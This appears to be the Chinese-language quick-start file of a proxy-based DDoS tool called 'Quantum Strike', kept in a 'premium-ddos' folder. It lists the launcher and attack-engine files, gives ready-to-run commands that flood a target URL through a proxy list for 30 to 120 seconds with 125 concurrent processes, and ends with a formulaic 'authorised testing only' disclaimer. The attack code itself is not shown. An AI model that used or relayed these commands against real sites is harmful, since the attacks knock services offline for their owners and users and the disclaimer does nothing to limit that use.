╔════════════════════════════════════════════════════════════╗
║                                                            ║
║     ⚡ QUANTUM STRIKE - 量子级打击系统 v3.0 ⚡             ║
║                                                            ║
║              🚀 快速启动指南 🚀                            ║
║                                                            ║
╚════════════════════════════════════════════════════════════╝

📍 当前位置: /Users/caoziyang/Desktop/work/qps/scripts/premium-ddos

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📦 文件列表:

  quantum-strike      主启动脚本（量子打击器）
  hyper-core.js       超核心攻击引擎
  README.md           详细文档
  QUICKSTART.txt      本文件

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

🚀 快速启动命令:

1️⃣  基础攻击（60秒）
   ./quantum-strike http://example.com ../../config/proxies.txt 60

2️⃣  高强度攻击（120秒）
   ./quantum-strike https://target.com ../../config/proxies.txt 120

3️⃣  快速测试（30秒）
   ./quantum-strike http://test.com ../../config/proxies.txt 30

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📋 参数说明:

格式: ./quantum-strike <URL> <代理文件> <时长>

  URL         目标网址（http:// 或 https://）
  代理文件    代理列表路径（建议用 ../../config/proxies.txt）
  时长        攻击持续时间（秒）

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚙️  运行效果:

启动后会看到:
  ✓ 125 个并发进程启动
  ✓ 量子引擎初始化（2秒）
  ✓ 实时请求输出

输出格式:
  ✓ [时间] 代理IP:端口 → 目标 | 方法

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

💡 Pro Tips:

  • 首次使用建议从 30 秒开始测试
  • 确保代理文件存在且有效
  • 监控本机资源使用情况
  • 仅用于授权测试环境

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  重要提示:

  本工具仅供授权测试使用
  禁止用于任何非法攻击行为
  使用者需自行承担法律责任

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

📚 更多信息请查看 README.md

⚡ QUANTUM STRIKE - 超越极限，打破边界！

